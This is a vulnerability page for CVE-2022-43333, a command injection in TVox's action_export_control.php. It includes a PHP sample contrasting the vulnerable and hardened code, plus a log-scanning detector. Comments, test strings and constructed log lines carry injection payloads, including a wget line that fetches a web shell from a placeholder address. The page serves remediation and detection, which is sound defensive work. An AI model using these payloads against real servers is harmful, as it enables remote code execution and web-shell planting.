CVE-2022-43333
Description
Telenia Software s.r.l TVox before v22.0.17 was discovered to contain a remote code execution (RCE) vulnerability in the component action_export_control.php.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- Telenia Software s.r.l / TVox
  - Range: <22.0.17
Patches
Vulnerability mechanics
Root cause
"The `pid` parameter passed to `action_export_control.php` is not validated and is concatenated directly into a PHP `exec()` call, allowing an attacker to inject arbitrary OS commands."
Attack vector
An unauthenticated attacker sends a crafted GET request to `/t-vox/manager/html/action_export_control.php` with a `pid` parameter that appends a malicious OS command using shell metacharacters [ref_id=1]. Because the file is externally accessible and requires no authentication, the attacker can execute arbitrary commands on the target server with the privileges of the `www-data` user [ref_id=1]. The advisory demonstrates chaining multiple requests to download a PHP web shell and then invoke it to achieve full remote code execution [ref_id=1].
Affected code
The vulnerable file is `/opt/telenia/tvox/php/siti/t-vox/t-vox/manager/html/action_export_control.php` [ref_id=1]. The advisory shows that the `pid` parameter from the user is appended directly to a PHP `exec()` call without any validation [ref_id=1].
What the fix does
No patch is included in the bundle. The advisory identifies the root cause as the lack of input validation on the `pid` parameter before it is passed to PHP's `exec()` function [ref_id=1]. Remediation therefore means validating `pid` against a strict allow-list (for example, accepting only a positive integer) before it reaches the shell, and ideally not passing user-supplied input to `exec()` at all [ref_id=1]. Because the advisory also reports that the endpoint is reachable without authentication [ref_id=1], a complete fix adds an authentication check to the handler as well, so that even a future validation bypass is only reachable by an authenticated user.
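The vulnerable pattern the advisory describes, beside a hardened version, as an added illustration: this is not the TVox source, which is not reproduced on this page. The constant `TVOX_EXPORT_BIN`, the function names and the `$authenticated` flag are assumptions standing in for whatever the real script invokes and for the application's own session check. Assumes PHP 8.0 or later.

```php
<?php
// Added illustration, not TVox source: the real action_export_control.php is not
// reproduced on this page. TVOX_EXPORT_BIN stands in for whatever program the
// script actually runs with the pid; the function names are ours.
const TVOX_EXPORT_BIN = '/opt/telenia/bin/tvox_export';   // placeholder path (assumption)

// Vulnerable pattern as the advisory describes it: the raw query-string value is
// concatenated into the exec() command line, so a request such as
//   ?pid=4711;id   or   ?pid=1|wget http://203.0.113.10/sh.php -O /tmp/sh.php
// runs the injected command under the web server account (www-data).
function export_control_vulnerable(array $get): array
{
    $pid = $get['pid'];                       // no validation of any kind
    exec(TVOX_EXPORT_BIN . ' ' . $pid, $out, $rc);
    return [$rc, $out];
}

// Allow-list validation: a pid is a positive integer and nothing else. Every
// advisory-style payload fails here because it contains non-digit characters.
function validate_pid(mixed $raw): ?int
{
    $pid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $pid === false ? null : $pid;
}

// Hardened handler. $authenticated stands for the session/role check the
// application would perform; the advisory notes the endpoint needed none.
function export_control_hardened(array $get, bool $authenticated): array
{
    if (!$authenticated) {
        http_response_code(401);
        return [1, []];
    }
    $pid = validate_pid($get['pid'] ?? null);
    if ($pid === null) {
        http_response_code(400);
        return [1, []];
    }
    // Second layer: even the validated integer goes through escapeshellarg(), so a
    // later loosening of validate_pid() cannot reintroduce shell parsing.
    exec(TVOX_EXPORT_BIN . ' ' . escapeshellarg((string) $pid), $out, $rc);
    return [$rc, $out];
}

// CLI self-check (php this_file.php): prints accepted/rejected for each candidate
// without touching the shell at all.
foreach (['4711', '4711;id', '1|wget http://203.0.113.10/sh.php', '', '-1'] as $candidate) {
    printf("%-40s %s\n", var_export($candidate, true),
        validate_pid($candidate) === null ? 'rejected' : 'accepted');
}
```

The two layers are deliberately independent: validation rejects everything that is not a positive integer, and `escapeshellarg()` guarantees that whatever does reach `exec()` is a single quoted argument. Dropping either one in a later change still leaves the other standing.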
Preconditions
- network: Attacker must be able to reach the TVox Web Client over the network.
- auth: No authentication is required; the endpoint is publicly accessible.
- input: Attacker must supply a crafted `pid` parameter containing shell metacharacters.
Reproduction
The advisory's proof of concept is a GET request to `https://X.X.X.X/t-vox/manager/html/action_export_control.php` with a `pid` value that appends an OS command using shell metacharacters [ref_id=1]. By chaining several such requests, the advisory fetches a PHP web shell onto the server and then calls it through the web server, after which arbitrary commands run as `www-data` [ref_id=1].
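A log-side detection for the request pattern described in the attack vector and reproduction sections above, added here as an example and not taken from the advisory. The access-log lines are constructed for this example: the path is the one the advisory names, but the client addresses, timestamps and payloads are made up; the two-stage payload in the third line only mirrors the advisory's description of fetching a web shell. Assumes PHP 8.0 or later and Apache combined log format.

```php
<?php
// Added example, not part of the advisory. Constructed access-log lines: the
// path matches the advisory, addresses, times and payloads are made up.
const LOG_LINES = [
    '203.0.113.10 - - [10/Nov/2022:08:14:02 +0000] "GET /t-vox/manager/html/action_export_control.php?pid=4711 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [10/Nov/2022:08:14:09 +0000] "GET /t-vox/manager/html/action_export_control.php?pid=4711%3Bid HTTP/1.1" 200 37 "-" "curl/7.85.0"',
    '203.0.113.10 - - [10/Nov/2022:08:14:15 +0000] "GET /t-vox/manager/html/action_export_control.php?pid=1%7Cwget%20http%3A%2F%2F203.0.113.10%2Fsh.php%20-O%20%2Ftmp%2Fsh.php HTTP/1.1" 200 37 "-" "curl/7.85.0"',
    '198.51.100.7 - - [10/Nov/2022:08:15:00 +0000] "GET /t-vox/manager/html/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
];

// Characters that let a value appended to an exec() string start a second
// command, substitute one, or redirect output.
const SHELL_META = '/[;|&`$()<>\\\\\n\r]/';

// Returns null for a benign line, otherwise a finding for that line.
function flag_pid_injection(string $line): ?array
{
    // Combined log format: client - - [time] "METHOD target HTTP/x" status ...
    if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3})/', $line, $m)) {
        return null;
    }
    [, $client, $time, $target, $status] = $m;
    $path  = (string) (parse_url($target, PHP_URL_PATH) ?? '');
    $query = (string) (parse_url($target, PHP_URL_QUERY) ?? '');
    if (!str_ends_with($path, '/action_export_control.php')) {
        return null;
    }
    parse_str($query, $params);               // URL-decodes the values for us
    $pid = $params['pid'] ?? '';
    if (is_string($pid) && preg_match('/^[1-9]\d*$/', $pid)) {
        return null;                          // plain positive integer: expected use
    }
    // Anything else is at least anomalous; a shell metacharacter is an injection attempt.
    $severity = is_string($pid) && preg_match(SHELL_META, $pid) ? 'alert' : 'warn';
    return [
        'client'   => $client,
        'time'     => $time,
        'status'   => $status,
        'pid'      => is_string($pid) ? $pid : json_encode($pid),
        'severity' => $severity,
    ];
}

function scan_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        if (($f = flag_pid_injection($line)) !== null) {
            $findings[] = $f;
        }
    }
    return $findings;
}

// The HTTP status is kept in the finding so responders can separate requests the
// handler accepted from ones rejected with 4xx after a fix is deployed.
foreach (scan_log(LOG_LINES) as $f) {
    printf("[%s] %s %s status=%s pid=%s\n",
        strtoupper($f['severity']), $f['time'], $f['client'], $f['status'], $f['pid']);
}
```

Matching on the decoded value rather than the raw request line matters: the advisory's payloads arrive URL-encoded (`%3B`, `%7C`), so a rule that greps for a literal `;` or `|` in the access log misses them. Flagging every non-integer `pid` as at least a warning also catches probing that uses encodings the metacharacter list does not cover.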
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1 reference ([ref_id=1], cited throughout; the entry itself is not reproduced on this page)
News mentions
0: No linked articles in our index yet.